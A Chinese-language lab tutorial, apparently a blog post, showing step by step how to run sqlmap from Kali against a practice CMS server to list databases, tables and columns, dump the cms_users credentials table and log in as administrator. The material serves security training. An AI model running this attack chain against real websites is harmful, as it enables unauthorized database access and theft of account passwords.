利用sqlMap工具攻击网站,进入数据库(MySQL),获取管理员账号和密码,登录网站kali系统有SqlMap工具,所以用kali系统作为攻击机,靶机是一个文章管理系统的网站服务器(所用环境来源于360),接下来我们就来聊聊关于sqlmap获取数据库名?以下内容大家不妨参考一二希望能帮到您!
sqlmap获取数据库名
利用sqlMap工具攻击网站,进入数据库(MySQL),获取管理员账号和密码,登录网站。kali系统有SqlMap工具,所以用kali系统作为攻击机,靶机是一个文章管理系统的网站服务器。(所用环境来源于360)
靶机ip:172.23.188.13
第一步:在kali系统浏览器访问web服务器
命令:
http://172.23.188.13:8083/show.php?id=3
172.23.188.13:靶机ip 8083 是端口
第二步:在kali系统终端上,进行sql注入,获取数据库信息
命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3
在执行过程中,会询问配置选择时,都默认输入yes或y,如下图
在选择完默认配置之后,会显示出web服务的信息,如下图
第三步:获取web服务器上的数据库信息
命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3 --dbs
--dbs 是查看所有数据库
执行完命令之后获得数据库信息如下
第4步:进入查看数据库cms中的表
命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms --tables
-D 是查看某个数据库, cms是数据库名,用来查看cms数据库
--tables 查看数据库中所有的表
命令执行完之后,结果如下。cms_users应该是存放用户帐号和密码的表
第5步:进入cms数据库中的cms_users表,查看所有的字段命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms -T cms_users --columns
-T 是查看某个数据表, cms_users是表名,用来查看cms_users表
--columns 查看的表中的所有字段
执行完命令得到结果
第6步:进入cms数据库中的cms_users表,查看所有的字段,及字段的内容
命令:
sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms -T cms_users --columns --dump
-T 是查看某个数据表, cms_users是表名,用来查看cms_users表
--columns 查看的表中的所有字段
--dump 查看所有字段的内容
在执行过程中,会询问4次配置选择,选择如下
得到结果如下:
第7步:用帐号密码登录网站
结果登录成功,如下图
